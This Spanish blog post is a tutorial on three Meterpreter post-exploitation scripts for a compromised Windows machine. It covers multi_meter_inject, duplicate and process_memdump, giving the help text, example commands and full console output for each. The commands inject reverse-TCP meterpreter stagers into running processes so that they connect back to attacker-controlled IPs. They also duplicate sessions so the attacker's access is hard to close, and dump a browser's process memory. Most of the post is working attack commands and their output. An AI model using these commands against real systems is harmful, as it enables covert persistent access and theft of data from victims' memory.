Inicio > Hacking, MetaSploit > Manipulación de Memoria sobre una maquina comprometida utilizando Meterpreter

Manipulación de Memoria sobre una maquina comprometida utilizando Meterpreter

Meterpreter es bastante robusto a la hora de manipular la memoria de una víctima y los procesos cargados en ella, este nivel de potencia es alcanzado gracias a la definición de scripts meterpreter escritos en Ruby, ya que le permite al desarrollador crearlos y desplegarlos en metasploit o utilizar algunos existentes para diversos fines. En entradas anteriores se ha indicado el uso de algunos de estos scripts y herramientas adicionales como Volatility FrameWork y PMDump, en esta ocasión, se indicará el uso de algunos scripts adicionales para manipular la memoria de una victima determinada.

multi_meter_inject

Este script intentará crear una conexión reversa en la memoria de uno o muchos PID’s especificados por parámetro, en el caso de que estos PID no sean indicados, se iniciará por defecto un nuevo proceso con notepad.exe. Una de las principales ventajas de este script es que se pueden especificar múltiples host y multiples PID’s para crear el stager de meterpreter, esto significa que la sesión meterpreter creada, puede “replicarse” a otras maquinas en las que el atacante también tendrá un payload meterpreter esperando a la conexión del stager.
En resumen, el atacante tendrá la posibilidad de crear tantas sesiones meterpreter contra la maquina comprometida como maquinas disponga y cada una de estas sesiones será “insertada” en un proceso que se encuentra en ejecución en la maquina comprometida.

meterpreter > run multi_meter_inject -h

Meterpreter Script for injecting a reverce tcp Meterpreter Payloadin to memory of multiple PIDs, if none is provided a notepad process.will be created and a Meterpreter Payload will be injected in to each.

OPTIONS:

-h Help menu.

-m Start Exploit multi/handler for return connection

-mp <opt> Provide Multiple PID for connections separated by comma one per IP.

-mr <opt> Provide Multiple IP Addresses for Connections separated by comma.

-p <opt> The port on the remote host where Metasploit is listening (default: 4444)

-pt <opt> Specify Reverse Connection Meterpreter Payload. Default windows/meterpreter/reverse_tcp

Un ejemplo de ejecución de este script puede ser el siguiente:

meterpreter > run multi_meter_inject -mr 192.168.1.36,192.168.1.37 -p 3344 -mp 628,792

[*] Creating a reverse meterpreter stager: LHOST=192.168.1.36 LPORT=3344

[*] Injecting meterpreter into process ID 628

[*] Allocated memory at address 0x00d60000, for 290 byte stager

[*] Writing the stager into memory…

[+] Successfully injected Meterpreter in to process: 628

[*] Creating a reverse meterpreter stager: LHOST=192.168.1.37 LPORT=3344

[*] Injecting meterpreter into process ID 792

[*] Allocated memory at address 0x003e0000, for 290 byte stager

[*] Writing the stager into memory…

[+] Successfully injected Meterpreter in to process: 792

Con el comando anterior, se han creado dos sesiones meterpreter controladas por el atacante en las direcciones 192.168.1.36 y 192.168.1.37 ambas escuchando por el puerto 3344, estas sesiones han sido insertadas en los procesos 628 y 792 respectivamente, cada uno de estos procesos corresponde a un programa en ejecución en la maquina comprometida.

duplicate

Este script tiene una funcionalidad bastante similar al script multi_meter_inject ya que se encarga de replicar la sesión meterpreter en otro proceso del sistema operativo con el fin de que sea difícil cerrar el acceso desde la maquina atacada a la maquina del atacante

meterpreter > run duplicate -h

OPTIONS:

-D Disable the automatic multi/handler (use with -r to accept on another system)

-P <opt> Process id to inject into; use instead of -e if multiple copies of one executable are running.

-e <opt> Executable to inject into. Default notepad.exe, will fall back to spawn if not found.

-h This help menu

-p <opt> The port on the remote host where Metasploit is listening (default: 4546)

-r <opt> The IP of a remote Metasploit listening for the connect back

-s Spawn new executable to inject to. Only useful with -P.

-w Write and execute an exe instead of injecting into a process

A modo de ejemplo, este script puede ser ejecutado con los siguientes parámetros

meterpreter > run duplicate -r 192.168.1.34 -p 4444

[*] Creating a reverse meterpreter stager: LHOST=192.168.1.34 LPORT=4444

[*] Running payload handler

[*] Current server process: sgiByfbLo.exe (1780)

[*] Duplicating into notepad.exe…

[*] Injecting meterpreter into process ID 3884

[*] Allocated memory at address 0x00e10000, for 290 byte stager

[*] Writing the stager into memory…

[*] New server process: 3884

Con la maquina 192.168.1.34 controlada por el atacante en el puerto 4444 recibirá el stager correspondiente a la sesión meterpreter replicada.

process_memdump

En una entrada anterior se ha indicado el uso de pmdump para realizar un volcado de memoria usando un script de meterpreter externo al framework, con este comando se puede llevar a cabo esta misma tarea, solamente que en lugar de utilizar pmdump se utiliza memdump sobre el proceso seleccionado

meterpreter > run process_memdump -h

USAGE:

EXAMPLE: run process_dump putty.exe

EXAMPLE: run process_dump -p 1234

OPTIONS:

-h Help menu.

-n <opt> Name of process to dump.

-p <opt> PID of process to dump.

-q Query the size of the Process that would be dump in bytes.

-r <opt> Text file wih list of process names to dump memory for, one per line.

-t toggle location information in dump.

Un ejemplo del uso de este script puede ser:

meterpreter > run process_memdump -p 556

[*] Dumping memory for iexplore.exe

[*] Dumping Memory of iexplore.exe with PID: 556

[*] base size = 64

[*] base size = 128

[*] base size = 192

[*] base size = 1224

[*] base size = 1228

[*] base size = 1280

[*] base size = 1344

[*] base size = 2368

[*] base size = 2432

[*] base size = 2496

[*] Saving Dumped Memory to /root/.msf3/logs/scripts/proc_memdump/192.168.1.36_iexplore.exe_556_20110512.0758.dmp

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: